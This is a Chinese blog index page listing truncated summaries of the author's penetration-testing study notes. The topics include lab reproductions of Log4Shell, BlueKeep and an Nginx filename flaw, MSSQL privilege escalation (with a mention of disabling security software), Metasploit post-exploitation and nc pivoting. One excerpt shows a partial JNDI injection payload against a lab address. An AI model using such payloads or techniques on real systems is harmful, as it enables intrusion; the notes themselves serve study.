会员
周边
众包
新闻
博问
闪存
赞助商
Chat2DB
所有博客
当前博客
我的博客
我的园子
账号设置
会员中心
简洁模式
...
退出登录
注册
登录
4A16
博客园
首页
新随笔
联系
订阅
管理
2024年5月17日
log4j2(CVE-2021-44228)复现
摘要: 1.启动漏洞环境 2.通过dnslog验证漏洞 先获取一个subdomain 3.可利用/admin/cores传参 4.构造payload 访问 http://192.168.80.134:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.
阅读全文
posted @ 2024-05-17 14:28 4A16
阅读(14)
评论(0)
推荐(0)
2024年4月22日
提权
摘要: mssql提权 条件:1433 端口开启 允许外连 具备sa权限 得到用户名和密码 使用sqltools进行连接利用 (执行命令) 如果显示组件被禁用 使用mssql查询分析器安装组件 用完之后删掉这些组件 开启3389 在查询分析器中输入 如果添加账户提升为管理员遇见安全狗,可以执行命令把安全狗服
阅读全文
posted @ 2024-04-22 22:21 4A16
阅读(12)
评论(0)
推荐(0)
2024年4月15日
业务逻辑漏洞
摘要: 支付逻辑漏洞 购物商城 在线购买的一些平台(充值平台,点卡,等) 微信小程序流量包支付时抓包修改 把钱改成负数 目前较少 1.抓包订单号修改 商品变了金额没变 2.修改金额 3.修改数量 认证模块逻辑漏洞 暴力破解 Cookie仿冒欺骗 Session欺骗延迟 前端Js代码验证 服务器响应欺骗 Co
阅读全文
posted @ 2024-04-15 14:35 4A16
阅读(2)
评论(0)
推荐(0)
2024年4月8日
JSP中间件漏洞
摘要: struts2漏洞 特征:.do或.action jsp站挖掘方向: 目标站没有漏洞 扩大目标,进行迂回渗透思路 旁站:ip反查域名,端口扫描 子域名:子域名服务器,子域名服务器端口 端口:查看开放的服务 信息收集关键词: inurl:userlogin.action inurl:user.acti
阅读全文
posted @ 2024-04-08 14:53 4A16
阅读(53)
评论(0)
推荐(0)
2024年4月3日
编辑器漏洞笔记
摘要: 编辑器路径查找 查找编辑器目录 目录扫描 目录遍历 蜘蛛爬行 一个网站可能存在多个编辑器 测试时可进一步扫描编辑器二级目录 xxx/ewbeditor/ xxx/editor/ xxx/edit/ xxx/fck/ 注意 查找路径时应注意站中站和子站的编辑器路径 一些老站点的高位端口可能存在编辑器漏
阅读全文
posted @ 2024-04-03 11:24 4A16
阅读(37)
评论(0)
推荐(0)
2024年3月27日
内网信息收集
摘要: 拿到跳板机权限后 ,使用msf进行提权,先挂起当前会话,使用search suggest寻找适合利用的模块使用,设置一个会话set session 1,run 此时选取一个常用的漏洞 使用,设置会话并且run 此时权限得到提升 Ps查看进程 migrate迁移进程 进入cmd Systeminfo、
阅读全文
posted @ 2024-03-27 12:22 4A16
阅读(16)
评论(0)
推荐(0)
2024年3月26日
内网穿透
摘要: 横向穿透纵向穿透 内网有5台80网段主机和90网段主机,拿下80.1渗透80.2、80.3称为横向,通过80.1渗透90.1称为纵向,再通过90.1继续横向穿透90网段 nc的使用 传递文件传递shell扫端口 同步显示 建立管道服务 指定端口范围 指定扫描速度进行端口扫描 一句话菜刀上传文件走的H
阅读全文
posted @ 2024-03-26 21:01 4A16
阅读(26)
评论(0)
推荐(0)
2024年1月25日
文件上传
摘要: 文件解析漏洞 一种容器脚本运行状态的漏洞 常见的容器windows下:apache、iis、nginx、tomcat iis解析漏洞 后缀解析: (iis 6.0) 服务器误将后缀为asa、cer、cdx、asax、ascx的脚本当作asp脚本来运行,这就是解析上的问题,当我们上传文件时上传asp被
阅读全文
posted @ 2024-01-25 17:56 4A16
阅读(29)
评论(0)
推荐(0)
2024年1月20日
cve _2019_0708复现
摘要: 实验环境 攻击机:kali 靶机:win7 均在NAT模式下,处于同一网段 实验步骤 1.search 0708 2.使用扫描命令use auxiliary/scanner/rdp/cve_2019_0708_bluekeep,设置靶机ip 3,使用攻击命令use exploit windows/r
阅读全文
posted @ 2024-01-20 13:46 4A16
阅读(7)
评论(0)
推荐(0)
2024年1月19日
Nginx文件名逻辑漏洞(CVE-2013-4547)复现
摘要: 使用docker搭建vulhub漏洞环境,启动环境 漏洞复现 1.打开环境 2.上传php文件,失败 3.上传jpg文件,成功,注意要在后缀加空格 4.访问hettp://192.168.80.134:8080/uploadfiles/test.jpg a.php (这里a用于占位便于十六进制修改)
阅读全文
posted @ 2024-01-19 20:15 4A16
阅读(10)
评论(0)
推荐(0)
下一页
公告